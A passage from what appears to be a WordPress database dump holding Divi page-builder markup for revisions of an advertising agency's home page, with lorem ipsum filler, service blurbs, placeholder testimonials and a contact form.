custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-18 21:04:02','2020-07-18 21:04:02','',134,'https://52.66.212.87/2020/07/18/134-revision-v1/',0,'revision','',0),(348,1,'2020-07-18 21:46:11','2020-07-18 21:46:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.0\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting 